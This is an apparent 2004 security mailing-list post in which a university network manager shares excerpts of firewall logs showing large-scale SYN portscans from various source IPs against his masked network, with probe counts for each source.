Jul 2 21:47:30 195.174.64.199:3331 -> xxx.yyy.1.2:139 SYN ******S*
Jul 2 21:47:30 195.174.64.199:3332 -> xxx.yyy.1.3:139 SYN ******S*
Jul 2 21:47:30 195.174.64.199:3333 -> xxx.yyy.1.4:139 SYN ******S*
Jul 2 21:47:30 195.174.64.199:3334 -> xxx.yyy.1.5:139 SYN ******S*
Jul 2 21:47:30 195.174.64.199:3338 -> xxx.yyy.1.9:139 SYN ******S*
Jul 2 21:47:30 195.174.64.199:3339 -> xxx.yyy.1.10:139 SYN ******S*
Jul 2 21:47:30 195.174.64.199:3340 -> xxx.yyy.1.11:139 SYN ******S*
[...]
Jul 2 21:58:30 195.174.64.199:3650 -> xxx.yyy.255.83:139 SYN ******S*
Jul 2 21:58:30 195.174.64.199:3666 -> xxx.yyy.255.99:139 SYN ******S*
Jul 2 21:58:30 195.174.64.199:3663 -> xxx.yyy.255.96:139 SYN ******S*
Jul 2 21:58:30 195.174.64.199:3660 -> xxx.yyy.255.93:139 SYN ******S*
Jul 2 21:58:30 195.174.64.199:3682 -> xxx.yyy.255.115:139 SYN ******S*
Jul 2 21:58:30 195.174.64.199:3695 -> xxx.yyy.255.128:139 SYN ******S*
Jul 2 21:58:30 195.174.64.199:3692 -> xxx.yyy.255.125:139 SYN ******S*
Jul 2 21:58:30 195.174.64.199:3698 -> xxx.yyy.255.131:139 SYN ******S*
Jul 2 21:58:31 195.174.64.199:3730 -> xxx.yyy.255.163:139 SYN ******S*
38256

Jul 2 08:25:21 212.234.232.145:4433 -> xxx.yyy.1.0:1433 SYN ******S*
Jul 2 08:25:21 212.234.232.145:4435 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 2 08:25:21 212.234.232.145:4437 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 2 08:25:21 212.234.232.145:4438 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 2 08:25:21 212.234.232.145:4439 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 2 08:25:21 212.234.232.145:4440 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 2 08:25:21 212.234.232.145:4441 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 2 08:25:21 212.234.232.145:4442 -> xxx.yyy.1.7:1433 SYN ******S*
[...]
Jul 2 10:23:09 212.234.232.145:4178 -> xxx.yyy.132.13:1433 SYN ******S*
Jul 2 10:23:09 212.234.232.145:4177 -> xxx.yyy.132.12:1433 SYN ******S*
Jul 2 10:23:09 212.234.232.145:4176 -> xxx.yyy.132.11:1433 SYN ******S*
Jul 2 10:23:09 212.234.232.145:4174 -> xxx.yyy.132.10:1433 SYN ******S*
Jul 2 10:23:09 212.234.232.145:4173 -> xxx.yyy.132.9:1433 SYN ******S*
Jul 2 10:23:09 212.234.232.145:4252 -> xxx.yyy.132.17:1433 SYN ******S*
Jul 2 10:23:09 212.234.232.145:4254 -> xxx.yyy.132.18:1433 SYN ******S*
Jul 2 10:23:09 212.234.232.145:4256 -> xxx.yyy.132.19:1433 SYN ******S*
Jul 2 10:23:09 212.234.232.145:4259 -> xxx.yyy.132.20:1433 SYN ******S*
36744

Jul 2 04:16:51 81.208.74.191:65187 -> xxx.yyy.1.1:8000 SYN ******S*
Jul 2 04:16:51 81.208.74.191:65189 -> xxx.yyy.1.2:8000 SYN ******S*
Jul 2 04:16:51 81.208.74.191:65192 -> xxx.yyy.1.3:8000 SYN ******S*
Jul 2 04:16:51 81.208.74.191:65193 -> xxx.yyy.1.4:8000 SYN ******S*
Jul 2 04:16:54 81.208.74.191:65194 -> xxx.yyy.1.5:8000 SYN ******S*
Jul 2 04:16:51 81.208.74.191:65195 -> xxx.yyy.1.6:8000 SYN ******S*
Jul 2 04:16:54 81.208.74.191:65201 -> xxx.yyy.1.7:8000 SYN ******S*
Jul 2 04:16:54 81.208.74.191:65202 -> xxx.yyy.1.8:8000 SYN ******S*
[...]
Jul 2 04:28:45 81.208.74.191:51811 -> xxx.yyy.255.245:8000 SYN ******S*
Jul 2 04:28:45 81.208.74.191:51813 -> xxx.yyy.255.246:8000 SYN ******S*
Jul 2 04:28:45 81.208.74.191:51814 -> xxx.yyy.255.247:8000 SYN ******S*
Jul 2 04:28:45 81.208.74.191:51815 -> xxx.yyy.255.248:8000 SYN ******S*
Jul 2 04:28:45 81.208.74.191:51816 -> xxx.yyy.255.249:8000 SYN ******S*
Jul 2 04:28:45 81.208.74.191:51817 -> xxx.yyy.255.250:8000 SYN ******S*
Jul 2 04:28:46 81.208.74.191:51820 -> xxx.yyy.255.253:8000 SYN ******S*
Jul 2 04:28:46 81.208.74.191:51821 -> x xx.yyy.255.254:8000 SYN ******S*
31944

[...]
25151 Jul 2 06:47:41 209.88.22.202:1813 -> xxx.yyy.32.0:1433 SYN ******S* Jul 2 06:47:41 209.88.22.202:1814 -> xxx.yyy.32.1:1433 SYN ******S* Jul 2 06:47:41 209.88.22.202:1815 -> xxx.yyy.32.2:1433 SYN ******S* Jul 2 06:47:41 209.88.22.202:1816 -> xxx.yyy.32.3:1433 SYN ******S* Jul 2 06:47:41 209.88.22.202:1817 -> xxx.yyy.32.4:1433 SYN ******S* Jul 2 06:47:41 209.88.22.202:1818 -> xxx.yyy.32.5:1433 SYN ******S* Jul 2 06:47:41 209.88.22.202:1819 -> xxx.yyy.32.6:1433 SYN ******S* Jul 2 06:47:41 209.88.22.202:1820 -> xxx.yyy.32.7:1433 SYN ******S* [...] Jul 2 07:44:54 209.88.22.202:52663 -> xxx.yyy.95.240:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52671 -> xxx.yyy.95.248:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52672 -> xxx.yyy.95.249:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52674 -> xxx.yyy.95.251:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52673 -> xxx.yyy.95.250:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52676 -> xxx.yyy.95.253:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52675 -> xxx.yyy.95.252:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52678 -> xxx.yyy.95.255:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52677 -> xxx.yyy.95.254:1433 SYN ******S* 22632 Jul 2 06:56:04 213.143.118.98:4142 -> xxx.yyy.214.246:5554 SYN ******S* Jul 2 06:56:05 213.143.118.98:1039 -> xxx.yyy.214.246:1023 SYN ******S* Jul 2 06:56:07 213.143.118.98:1908 -> xxx.yyy.214.246:9898 SYN ******S* Jul 2 06:56:04 213.143.118.98:4143 -> xxx.yyy.214.247:5554 SYN ******S* Jul 2 06:56:05 213.143.118.98:1040 -> xxx.yyy.214.247:1023 SYN ******S* Jul 2 06:56:07 213.143.118.98:1909 -> xxx.yyy.214.247:9898 SYN ******S* Jul 2 06:56:04 213.143.118.98:4144 -> xxx.yyy.214.248:5554 SYN ******S* Jul 2 06:56:05 213.143.118.98:1047 -> xxx.yyy.214.248:1023 SYN ******S* [...] 
Jul 2 06:56:48 213.143.118.98:1908 -> xxx.yyy.235.105:9898 SYN ******S* Jul 2 06:56:48 213.143.118.98:1909 -> xxx.yyy.235.106:9898 SYN ******S* Jul 2 06:56:48 213.143.118.98:1910 -> xxx.yyy.235.107:9898 SYN ******S* Jul 2 06:56:48 213.143.118.98:1913 -> xxx.yyy.235.110:9898 SYN ******S* Jul 2 06:56:48 213.143.118.98:1911 -> xxx.yyy.235.108:9898 SYN ******S* Jul 2 06:56:48 213.143.118.98:1915 -> xxx.yyy.235.112:9898 SYN ******S* Jul 2 06:56:48 213.143.118.98:1912 -> xxx.yyy.235.109:9898 SYN ******S* Jul 2 06:56:48 213.143.118.98:1914 -> xxx.yyy.235.111:9898 SYN ******S* 15271 Jul 2 01:02:12 221.201.48.15:3013 -> xxx.yyy.174.223:5554 SYN ******S* Jul 2 01:02:13 221.201.48.15:3224 -> xxx.yyy.174.223:1023 SYN ******S* Jul 2 01:02:15 221.201.48.15:3605 -> xxx.yyy.174.223:9898 SYN ******S* Jul 2 01:02:12 221.201.48.15:3014 -> xxx.yyy.174.224:5554 SYN ******S* Jul 2 01:02:13 221.201.48.15:3225 -> xxx.yyy.174.224:1023 SYN ******S* Jul 2 01:02:15 221.201.48.15:3606 -> xxx.yyy.174.224:9898 SYN ******S* Jul 2 01:02:12 221.201.48.15:3015 -> xxx.yyy.174.225:5554 SYN ******S* Jul 2 01:02:13 221.201.48.15:3226 -> xxx.yyy.174.225:1023 SYN ******S* [...] 
Jul 2 01:04:02 221.201.48.15:1467 -> xxx.yyy.176.69:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1468 -> xxx.yyy.176.74:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1466 -> xxx.yyy.176.63:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1471 -> xxx.yyy.176.75:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1487 -> xxx.yyy.176.76:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1489 -> xxx.yyy.176.84:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1488 -> xxx.yyy.176.78:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1490 -> xxx.yyy.176.85:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1491 -> xxx.yyy.176.86:9898 SYN ******S* 15113 Jul 2 00:31:54 218.12.17.75:2212 -> xxx.yyy.153.136:5554 SYN ******S* Jul 2 00:31:55 218.12.17.75:2396 -> xxx.yyy.153.136:1023 SYN ******S* Jul 2 00:31:57 218.12.17.75:2814 -> xxx.yyy.153.136:9898 SYN ******S* Jul 2 00:31:54 218.12.17.75:2213 -> xxx.yyy.153.137:5554 SYN ******S* Jul 2 00:31:55 218.12.17.75:2397 -> xxx.yyy.153.137:1023 SYN ******S* Jul 2 00:31:57 218.12.17.75:2815 -> xxx.yyy.153.137:9898 SYN ******S* Jul 2 00:31:54 218.12.17.75:2215 -> xxx.yyy.153.139:5554 SYN ******S* Jul 2 00:31:55 218.12.17.75:2399 -> xxx.yyy.153.139:1023 SYN ******S* [...] 
Jul 2 00:33:40 218.12.17.75:4944 -> xxx.yyy.173.250:9898 SYN ******S* Jul 2 00:33:40 218.12.17.75:4949 -> xxx.yyy.173.252:9898 SYN ******S* Jul 2 00:33:40 218.12.17.75:4947 -> xxx.yyy.173.251:9898 SYN ******S* Jul 2 00:33:40 218.12.17.75:4952 -> xxx.yyy.173.253:9898 SYN ******S* Jul 2 00:33:40 218.12.17.75:4955 -> xxx.yyy.173.254:9898 SYN ******S* Jul 2 00:33:40 218.12.17.75:4962 -> xxx.yyy.174.2:9898 SYN ******S* Jul 2 00:33:40 218.12.17.75:4958 -> xxx.yyy.173.255:9898 SYN ******S* Jul 2 00:33:40 218.12.17.75:4959 -> xxx.yyy.174.0:9898 SYN ******S* 12861 Jul 2 00:56:28 221.192.67.236:4280 -> xxx.yyy.235.134:5554 SYN ******S* Jul 2 00:56:29 221.192.67.236:1088 -> xxx.yyy.235.134:1023 SYN ******S* Jul 2 00:56:30 221.192.67.236:2200 -> xxx.yyy.235.134:9898 SYN ******S* Jul 2 00:56:28 221.192.67.236:4282 -> xxx.yyy.235.132:5554 SYN ******S* Jul 2 00:56:29 221.192.67.236:1090 -> xxx.yyy.235.132:1023 SYN ******S* Jul 2 00:56:30 221.192.67.236:2203 -> xxx.yyy.235.132:9898 SYN ******S* Jul 2 00:56:28 221.192.67.236:4293 -> xxx.yyy.235.130:5554 SYN ******S* Jul 2 00:56:29 221.192.67.236:1094 -> xxx.yyy.235.130:1023 SYN ******S* [...] 
Jul 2 00:58:08 221.192.67.236:3245 -> xxx.yyy.255.229:9898 SYN ******S* Jul 2 00:58:08 221.192.67.236:3242 -> xxx.yyy.255.226:9898 SYN ******S* Jul 2 00:58:08 221.192.67.236:3243 -> xxx.yyy.255.227:9898 SYN ******S* Jul 2 00:58:08 221.192.67.236:3252 -> xxx.yyy.255.232:9898 SYN ******S* Jul 2 00:58:08 221.192.67.236:3248 -> xxx.yyy.255.230:9898 SYN ******S* Jul 2 00:58:08 221.192.67.236:3253 -> xxx.yyy.255.233:9898 SYN ******S* Jul 2 00:58:08 221.192.67.236:3250 -> xxx.yyy.255.231:9898 SYN ******S* Jul 2 00:58:08 221.192.67.236:3254 -> xxx.yyy.255.234:9898 SYN ******S* 11993 Jul 2 00:56:29 61.51.215.97:3484 -> xxx.yyy.71.160:5554 SYN ******S* Jul 2 00:56:30 61.51.215.97:3821 -> xxx.yyy.71.160:1023 SYN ******S* Jul 2 00:56:32 61.51.215.97:4720 -> xxx.yyy.71.160:9898 SYN ******S* Jul 2 00:56:29 61.51.215.97:3485 -> xxx.yyy.71.161:5554 SYN ******S* Jul 2 00:56:30 61.51.215.97:3822 -> xxx.yyy.71.161:1023 SYN ******S* Jul 2 00:56:32 61.51.215.97:4689 -> xxx.yyy.71.161:9898 SYN ******S* Jul 2 00:56:29 61.51.215.97:3487 -> xxx.yyy.71.165:5554 SYN ******S* Jul 2 00:56:30 61.51.215.97:3826 -> xxx.yyy.71.165:1023 SYN ******S* [...] 
Jul 2 00:57:35 61.51.215.97:1221 -> xxx.yyy.91.185:9898 SYN ******S* Jul 2 00:57:35 61.51.215.97:1219 -> xxx.yyy.91.183:9898 SYN ******S* Jul 2 00:57:35 61.51.215.97:1222 -> xxx.yyy.91.186:9898 SYN ******S* Jul 2 00:57:35 61.51.215.97:1227 -> xxx.yyy.91.187:9898 SYN ******S* Jul 2 00:57:35 61.51.215.97:1230 -> xxx.yyy.91.188:9898 SYN ******S* Jul 2 00:57:35 61.51.215.97:1401 -> xxx.yyy.91.223:9898 SYN ******S* Jul 2 00:57:35 61.51.215.97:1399 -> xxx.yyy.91.221:9898 SYN ******S* Jul 2 00:57:35 61.51.215.97:1402 -> xxx.yyy.91.224:9898 SYN ******S* Jul 2 00:57:36 61.51.215.97:1535 -> xxx.yyy.92.2:9898 SYN ******S* 11469 Jul 2 00:56:57 61.50.245.72:2837 -> xxx.yyy.195.123:5554 SYN ******S* Jul 2 00:56:58 61.50.245.72:3330 -> xxx.yyy.195.123:1023 SYN ******S* Jul 2 00:57:00 61.50.245.72:4390 -> xxx.yyy.195.123:9898 SYN ******S* Jul 2 00:56:57 61.50.245.72:2839 -> xxx.yyy.195.125:5554 SYN ******S* Jul 2 00:56:58 61.50.245.72:3354 -> xxx.yyy.195.125:1023 SYN ******S* Jul 2 00:57:00 61.50.245.72:4405 -> xxx.yyy.195.125:9898 SYN ******S* Jul 2 00:56:57 61.50.245.72:2838 -> xxx.yyy.195.124:5554 SYN ******S* Jul 2 00:56:58 61.50.245.72:3331 -> xxx.yyy.195.124:1023 SYN ******S* [...] 
Jul 2 00:57:44 61.50.245.72:3535 -> xxx.yyy.215.193:9898 SYN ******S* Jul 2 00:57:44 61.50.245.72:3542 -> xxx.yyy.215.185:9898 SYN ******S* Jul 2 00:57:44 61.50.245.72:3543 -> xxx.yyy.215.186:9898 SYN ******S* Jul 2 00:57:44 61.50.245.72:3545 -> xxx.yyy.215.188:9898 SYN ******S* Jul 2 00:57:44 61.50.245.72:3546 -> xxx.yyy.215.189:9898 SYN ******S* Jul 2 00:57:44 61.50.245.72:3544 -> xxx.yyy.215.187:9898 SYN ******S* Jul 2 00:57:44 61.50.245.72:3547 -> xxx.yyy.215.190:9898 SYN ******S* Jul 2 00:57:44 61.50.245.72:3561 -> xxx.yyy.215.191:9898 SYN ******S* 11322 Jul 2 23:14:54 218.75.132.115:3888 -> xxx.yyy.1.2:1433 SYN ******S* Jul 2 23:14:51 218.75.132.115:3892 -> xxx.yyy.1.4:1433 SYN ******S* Jul 2 23:14:51 218.75.132.115:3902 -> xxx.yyy.1.8:1433 SYN ******S* Jul 2 23:14:52 218.75.132.115:3910 -> xxx.yyy.1.12:1433 SYN ******S* Jul 2 23:14:54 218.75.132.115:3886 -> xxx.yyy.1.1:1433 SYN ******S* Jul 2 23:14:52 218.75.132.115:3896 -> xxx.yyy.1.5:1433 SYN ******S* Jul 2 23:14:52 218.75.132.115:3932 -> xxx.yyy.1.20:1433 SYN ******S* Jul 2 23:14:52 218.75.132.115:3900 -> xxx.yyy.1.7:1433 SYN ******S* [...] 
Jul 2 23:18:59 218.75.132.115:4317 -> xxx.yyy.94.124:1433 SYN ******S* Jul 2 23:18:59 218.75.132.115:3238 -> xxx.yyy.95.162:1433 SYN ******S* Jul 2 23:18:59 218.75.132.115:4337 -> xxx.yyy.94.130:1433 SYN ******S* Jul 2 23:18:59 218.75.132.115:3173 -> xxx.yyy.95.131:1433 SYN ******S* Jul 2 23:18:59 218.75.132.115:3177 -> xxx.yyy.95.133:1433 SYN ******S* Jul 2 23:18:59 218.75.132.115:4241 -> xxx.yyy.94.104:1433 SYN ******S* Jul 2 23:18:59 218.75.132.115:4226 -> xxx.yyy.94.100:1433 SYN ******S* Jul 2 23:18:59 218.75.132.115:4347 -> xxx.yyy.94.133:1433 SYN ******S* Jul 2 23:19:00 218.75.132.115:3236 -> xxx.yyy.95.161:1433 SYN ******S* 11168 Jul 2 00:56:41 218.61.137.120:4456 -> xxx.yyy.154.100:5554 SYN ******S* Jul 2 00:56:42 218.61.137.120:1407 -> xxx.yyy.154.100:1023 SYN ******S* Jul 2 00:56:44 218.61.137.120:3084 -> xxx.yyy.154.100:9898 SYN ******S* Jul 2 00:56:41 218.61.137.120:4457 -> xxx.yyy.154.101:5554 SYN ******S* Jul 2 00:56:42 218.61.137.120:1409 -> xxx.yyy.154.101:1023 SYN ******S* Jul 2 00:56:44 218.61.137.120:3085 -> xxx.yyy.154.101:9898 SYN ******S* Jul 2 00:56:41 218.61.137.120:4458 -> xxx.yyy.154.102:5554 SYN ******S* Jul 2 00:56:42 218.61.137.120:1410 -> xxx.yyy.154.102:1023 SYN ******S* [...] 
Jul 2 00:57:25 218.61.137.120:1029 -> xxx.yyy.174.141:9898 SYN ******S* Jul 2 00:57:25 218.61.137.120:1031 -> xxx.yyy.174.142:9898 SYN ******S* Jul 2 00:57:25 218.61.137.120:1477 -> xxx.yyy.174.205:9898 SYN ******S* Jul 2 00:57:26 218.61.137.120:1480 -> xxx.yyy.174.206:9898 SYN ******S* Jul 2 00:57:26 218.61.137.120:1481 -> xxx.yyy.174.207:9898 SYN ******S* Jul 2 00:57:26 218.61.137.120:1486 -> xxx.yyy.174.217:9898 SYN ******S* Jul 2 00:57:26 218.61.137.120:1488 -> xxx.yyy.174.218:9898 SYN ******S* Jul 2 00:57:26 218.61.137.120:1487 -> xxx.yyy.174.208:9898 SYN ******S* 10856 Jul 2 13:45:32 68.173.228.183:22002 -> xxx.yyy.1.0:3127 SYN ******S* Jul 2 13:45:33 68.173.228.183:22002 -> xxx.yyy.1.0:1080 SYN ******S* Jul 2 13:45:33 68.173.228.183:22002 -> xxx.yyy.1.0:10080 SYN ******S* Jul 2 13:45:33 68.173.228.183:22002 -> xxx.yyy.1.0:3128 SYN ******S* Jul 2 13:45:33 68.173.228.183:22002 -> xxx.yyy.1.1:3127 SYN ******S* Jul 2 13:45:33 68.173.228.183:22002 -> xxx.yyy.1.1:1080 SYN ******S* Jul 2 13:45:33 68.173.228.183:22002 -> xxx.yyy.1.1:10080 SYN ******S* Jul 2 13:45:33 68.173.228.183:22002 -> xxx.yyy.1.1:3128 SYN ******S* [...] 
Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.253:3128 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.254:3127 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.254:1080 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.254:10080 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.254:3128 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.255:3127 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.255:1080 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.255:10080 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.255:3128 SYN ******S* 10022 Jul 2 21:02:42 68.163.18.234:4526 -> xxx.yyy.1.0:1433 SYN ******S* Jul 2 21:02:42 68.163.18.234:4529 -> xxx.yyy.1.1:1433 SYN ******S* Jul 2 21:02:42 68.163.18.234:4530 -> xxx.yyy.1.2:1433 SYN ******S* Jul 2 21:02:42 68.163.18.234:4531 -> xxx.yyy.1.3:1433 SYN ******S* Jul 2 21:02:42 68.163.18.234:4532 -> xxx.yyy.1.4:1433 SYN ******S* Jul 2 21:02:42 68.163.18.234:4534 -> xxx.yyy.1.5:1433 SYN ******S* Jul 2 21:02:42 68.163.18.234:4535 -> xxx.yyy.1.6:1433 SYN ******S* Jul 2 21:02:42 68.163.18.234:4539 -> xxx.yyy.1.7:1433 SYN ******S* [...] 
Jul 2 21:31:34 68.163.18.234:4067 -> xxx.yyy.32.254:1433 SYN ******S* Jul 2 21:31:34 68.163.18.234:4050 -> xxx.yyy.32.253:1433 SYN ******S* Jul 2 21:31:34 68.163.18.234:4049 -> xxx.yyy.32.252:1433 SYN ******S* Jul 2 21:31:34 68.163.18.234:4047 -> xxx.yyy.32.251:1433 SYN ******S* Jul 2 21:31:34 68.163.18.234:4041 -> xxx.yyy.32.250:1433 SYN ******S* Jul 2 21:31:34 68.163.18.234:4025 -> xxx.yyy.32.249:1433 SYN ******S* Jul 2 21:31:34 68.163.18.234:4020 -> xxx.yyy.32.248:1433 SYN ******S* Jul 2 21:31:34 68.163.18.234:4068 -> xxx.yyy.32.255:1433 SYN ******S* 8442 Jul 2 06:55:04 212.21.233.153:4334 -> xxx.yyy.195.91:5554 SYN ******S* Jul 2 06:55:04 212.21.233.153:1412 -> xxx.yyy.195.88:5554 SYN ******S* Jul 2 06:55:05 212.21.233.153:1412 -> xxx.yyy.195.88:1023 SYN ******S* Jul 2 06:55:04 212.21.233.153:4534 -> xxx.yyy.195.93:5554 SYN ******S* Jul 2 06:55:05 212.21.233.153:4334 -> xxx.yyy.195.93:1023 SYN ******S* Jul 2 06:55:04 212.21.233.153:4204 -> xxx.yyy.195.89:5554 SYN ******S* Jul 2 06:55:05 212.21.233.153:4748 -> xxx.yyy.195.89:1023 SYN ******S* Jul 2 06:55:04 212.21.233.153:3443 -> xxx.yyy.195.94:5554 SYN ******S* [...] 
Jul 2 06:57:42 212.21.233.153:1560 -> xxx.yyy.213.47:9898 SYN ******S* Jul 2 06:57:42 212.21.233.153:2419 -> xxx.yyy.213.57:9898 SYN ******S* Jul 2 06:57:42 212.21.233.153:2420 -> xxx.yyy.213.58:9898 SYN ******S* Jul 2 06:57:43 212.21.233.153:2097 -> xxx.yyy.213.64:9898 SYN ******S* Jul 2 06:57:43 212.21.233.153:1750 -> xxx.yyy.213.61:9898 SYN ******S* Jul 2 06:57:43 212.21.233.153:1764 -> xxx.yyy.213.62:9898 SYN ******S* Jul 2 06:57:43 212.21.233.153:2421 -> xxx.yyy.213.59:9898 SYN ******S* Jul 2 06:57:43 212.21.233.153:2435 -> xxx.yyy.213.60:9898 SYN ******S* Jul 2 06:57:43 212.21.233.153:2092 -> xxx.yyy.213.63:9898 SYN ******S* 7952 Jul 2 00:59:22 220.188.73.32:2924 -> xxx.yyy.154.103:5554 SYN ******S* Jul 2 00:59:23 220.188.73.32:3427 -> xxx.yyy.154.103:1023 SYN ******S* Jul 2 00:59:22 220.188.73.32:2926 -> xxx.yyy.154.100:5554 SYN ******S* Jul 2 00:59:23 220.188.73.32:3432 -> xxx.yyy.154.100:1023 SYN ******S* Jul 2 00:59:25 220.188.73.32:4836 -> xxx.yyy.154.100:9898 SYN ******S* Jul 2 00:59:22 220.188.73.32:2928 -> xxx.yyy.154.105:5554 SYN ******S* Jul 2 00:59:22 220.188.73.32:2929 -> xxx.yyy.154.104:5554 SYN ******S* Jul 2 00:59:25 220.188.73.32:4835 -> xxx.yyy.154.104:9898 SYN ******S* [...] 
Jul 2 01:00:07 220.188.73.32:2502 -> xxx.yyy.154.134:9898 SYN ******S*
Jul 2 01:00:07 220.188.73.32:2531 -> xxx.yyy.154.139:9898 SYN ******S*
Jul 2 01:00:07 220.188.73.32:2532 -> xxx.yyy.154.140:9898 SYN ******S*
Jul 2 01:00:07 220.188.73.32:2533 -> xxx.yyy.154.127:9898 SYN ******S*
Jul 2 01:00:07 220.188.73.32:2542 -> xxx.yyy.154.128:9898 SYN ******S*
Jul 2 01:00:07 220.188.73.32:2543 -> xxx.yyy.154.131:9898 SYN ******S*
Jul 2 01:00:07 220.188.73.32:2545 -> xxx.yyy.154.130:9898 SYN ******S*
Jul 2 01:00:07 220.188.73.32:2546 -> xxx.yyy.154.136:9898 SYN ******S*
Jul 2 01:00:07 220.188.73.32:2550 -> xxx.yyy.154.141:9898 SYN ******S*
6959

-- 
- Ken
===========================================================================
Ken Connelly (KC152)      Systems and Operations Manager, ITS - Network Services
University of Northern Iowa                         Cedar Falls, IA 50614-0121
email: Ken.Connelly at uni.edu    phone: (319) 273-5850    fax: (319) 273-7373

From Ken.Connelly at uni.edu Sun Jul 4 22:20:29 2004
From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu)
Date: Sun, 04 Jul 2004 17:20:29 -0500 (CDT)
Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects
Message-ID: <01LC2KWKDQ7O8YCTMZ@uni.edu>

The following extracts show the beginning and ending of scan activity that was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500.

Jul 3 04:01:24 203.73.34.81:4333 -> xxx.yyy.1.1:139 SYN ******S*
Jul 3 04:01:24 203.73.34.81:4334 -> xxx.yyy.1.2:139 SYN ******S*
Jul 3 04:01:24 203.73.34.81:4335 -> xxx.yyy.1.3:139 SYN ******S*
Jul 3 04:01:24 203.73.34.81:4340 -> xxx.yyy.1.4:139 SYN ******S*
Jul 3 04:01:24 203.73.34.81:4341 -> xxx.yyy.1.5:139 SYN ******S*
Jul 3 04:01:24 203.73.34.81:4343 -> xxx.yyy.1.6:139 SYN ******S*
Jul 3 04:01:24 203.73.34.81:4345 -> xxx.yyy.1.7:139 SYN ******S*
Jul 3 04:01:24 203.73.34.81:4348 -> xxx.yyy.1.8:139 SYN ******S*
[...]
Jul 3 07:50:35 203.73.34.81:3591 -> xxx.yyy.255.246:139 SYN ******S*
Jul 3 07:50:35 203.73.34.81:3592 -> xxx.yyy.255.247:139 SYN ******S*
Jul 3 07:50:35 203.73.34.81:3593 -> xxx.yyy.255.248:139 SYN ******S*
Jul 3 07:50:35 203.73.34.81:3594 -> xxx.yyy.255.249:139 SYN ******S*
Jul 3 07:50:35 203.73.34.81:3597 -> xxx.yyy.255.250:139 SYN ******S*
Jul 3 07:50:35 203.73.34.81:3603 -> xxx.yyy.255.251:139 SYN ******S*
Jul 3 07:50:36 203.73.34.81:3610 -> xxx.yyy.255.252:139 SYN ******S*
Jul 3 07:50:36 203.73.34.81:3620 -> xxx.yyy.255.253:139 SYN ******S*
Jul 3 07:50:36 203.73.34.81:3621 -> xxx.yyy.255.254:139 SYN ******S*
123686

Jul 3 07:39:32 210.66.60.193:1141 -> xxx.yyy.1.2:139 SYN ******S*
Jul 3 07:39:32 210.66.60.193:1142 -> xxx.yyy.1.1:139 SYN ******S*
Jul 3 07:39:32 210.66.60.193:1143 -> xxx.yyy.1.3:139 SYN ******S*
Jul 3 07:39:32 210.66.60.193:1144 -> xxx.yyy.1.4:139 SYN ******S*
Jul 3 07:39:32 210.66.60.193:1146 -> xxx.yyy.1.5:139 SYN ******S*
Jul 3 07:39:32 210.66.60.193:1148 -> xxx.yyy.1.6:139 SYN ******S*
Jul 3 07:39:32 210.66.60.193:1149 -> xxx.yyy.1.7:139 SYN ******S*
Jul 3 07:39:32 210.66.60.193:1151 -> xxx.yyy.1.8:139 SYN ******S*
[...]
Jul 3 11:29:19 210.66.60.193:2333 -> xxx.yyy.255.247:139 SYN ******S*
Jul 3 11:29:19 210.66.60.193:2337 -> xxx.yyy.255.248:139 SYN ******S*
Jul 3 11:29:19 210.66.60.193:2338 -> xxx.yyy.255.249:139 SYN ******S*
Jul 3 11:29:19 210.66.60.193:2342 -> xxx.yyy.255.250:139 SYN ******S*
Jul 3 11:29:19 210.66.60.193:2347 -> xxx.yyy.255.251:139 SYN ******S*
Jul 3 11:29:20 210.66.60.193:2352 -> xxx.yyy.255.252:139 SYN ******S*
Jul 3 11:29:20 210.66.60.193:2356 -> xxx.yyy.255.253:139 SYN ******S*
Jul 3 11:29:20 210.66.60.193:2362 -> xxx.yyy.255.254:139 SYN ******S*
122695

Jul 3 16:43:22 69.70.72.33:2719 -> xxx.yyy.1.0:1433 SYN ******S*
Jul 3 16:43:22 69.70.72.33:2722 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 3 16:43:22 69.70.72.33:2725 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 3 16:43:22 69.70.72.33:2730 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 3 16:43:22 69.70.72.33:2733 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 3 16:43:22 69.70.72.33:2737 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 3 16:43:22 69.70.72.33:2740 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 3 16:43:22 69.70.72.33:2743 -> xxx.yyy.1.7:1433 SYN ******S*
[...]
Jul 3 20:32:37 69.70.72.33:1303 -> xxx.yyy.255.244:1433 SYN ******S*
Jul 3 20:32:37 69.70.72.33:1319 -> xxx.yyy.255.248:1433 SYN ******S*
